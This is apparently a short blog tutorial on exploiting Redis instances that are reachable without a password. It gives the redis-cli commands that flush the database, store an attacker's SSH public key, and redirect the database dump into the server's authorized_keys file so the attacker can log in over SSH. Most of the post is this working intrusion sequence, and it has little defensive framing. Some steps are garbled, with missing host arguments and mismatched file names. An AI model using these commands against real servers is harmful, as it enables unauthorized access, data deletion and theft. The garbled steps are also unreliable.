Redis Unauthorized Access Vulnerability

Redis, is an open source, a data structure tool that can be used as an in-memory distributed database, message broker or cache.

Since it is designed to be accessed inside trusted environments, it should not be exposed on the Internet.

Redis’ are bind to public interface and even has no password authentication protection.

If Redis runs with the root account or not, attackers can write an SSH public key file to the root account, directly logging on to the victim server through SSH.

This may allow hackers to gain server privileges, delete or steal data.

Several times Redis will be configured to be accessible anonymously. In this case you won’t need to use any username and password. Talking to Redis service and execute the info command, it will let you know a lot of information about the server: SO running, Clients, memory…

On our machine ( Attacker Machine ) we need to install Redis tools:

sudo apt-get install redis-tools

We are going to create new ssh keys to we need to be inside our ssh folder:

$ ssh-keygen -t rsa

$ (echo -e “\n\n”; cat; echo -e “\n\n”) > test.txt

Now test.txt is just our public key but with newlines. We can write inside the memory of Redis using redis-cli:

$ redis-cli -h flushall

$ cat foo.txt | redis-cli -h -x set keyz

Now to dump our memory content into the authorized_keys file:

$ redis-cli -h> config get dir

1) “dir”

2) “/var/lib/redis/.ssh”> config set dir “/var/lib/redis/.ssh”

OK> config get dbfilename

1) “dbfilename”

2) “authorized_keys”> config set dbfilename “authorized_keys”

OK> save


Now the last step is to ssh to the target machine:

$ ssh -i id_rsa target@

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s